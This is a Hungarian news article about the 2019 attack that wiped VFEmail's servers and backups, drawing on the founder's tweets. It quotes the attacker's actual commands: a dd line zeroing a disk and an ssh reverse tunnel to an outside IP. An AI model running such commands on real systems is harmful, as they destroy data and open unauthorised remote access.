A VFEmaillel megtörtént az, amitől minden szolgáltató retteg: nemcsak, hogy feltörték a szervereiket, de minden adatot töröltek onnan. És még a biztonsági mentéseket is.
Szinte mindennapos, hogy egy szolgáltatást hackertámadás ér, és az is előfordul, hogy egy ilyen támadás során adatokat lopnak a kiberbűnözők. Olyan durva eredménnyel zárult támadásra, mint ami a napokban zajlott le, szerencsére ritkán van példa.
Az ArsTechnika beszámolója szerint nemrég az amerikai VFEmail e-mail-szolgáltatót érte nagyon súlyos kibertámadás. A hacker nemcsak, hogy betört a szolgáltatás szervereire, de gyakorlatilag az összes adathordozót sikerült megformáznia, még a biztonsági mentéseket is. Az akció miatt közel két évtized munkája semmisült meg. A céget alapító Rick Romero a Twitteren erősítette meg a hírt:
Yes, @VFEmail is effectively gone. It will likely not return.
— Havokmon (@Havokmon) 2019. február 12.
I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it.
Mint azt a 2001-ben indított szolgáltatásról írja, a VEFmail oda, és soha nem gondolta volna, hogy valakit annyira érdekel a munkája, hogy teljesen el akarja majd pusztítani.
A baj hétfőn kezdődött, amikor észrevették, hogy leálltak a szerverek. A VFEmail nem sokkal később Twitteren jelentette be, hogy megformázták az adattárolókat. A hackert akkor "kapták el", amikor a biztonsági mentés formázásának kellős közepénél járt.
Caught the perp in the middle of formatting the backup server:
— VFEmail.net (@VFEmail) 2019. február 11.
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N
Romero szerint a kár a szolgáltatás teljes infrastruktúráját érinti, a kár mértéke alapján pedig úgy tűnik, a támadónak több jelszava is volt, ami meglehetősen ijesztő gondolat. A szolgáltatást azóta újraindították, így újra lehet vele e-mailt küldeni.
A támadás indítéka nem egyértelmű. A zsarolóvírusok hasonló "törléssel" fenyegetnek, ugyanakkor előfordul, hogy az áldozat nem kap ilyen üzenetet. Persze az sem kizárt, hogy valakit a bosszú vezérelt, Romero azonban erre a felvetésre egyelőre nem reagált.
A VFEmailt még 2001-ben alapították, válaszul a 2000-ben fertőző ILoveYou nevű vírusra. Ez volt az a kártevő, ami továbbküldött e-mailek formájában fertőzte le a windows-os számítógépeket. A hackerhez az aktv@94.155.49.9 IP-cím köthető, ami két bulgáriai szolgáltatáshoz kapcsolódik.
Ha máskor is tudni szeretne hasonló dolgokról, lájkolja a HVG Tech rovatának Facebook-oldalát.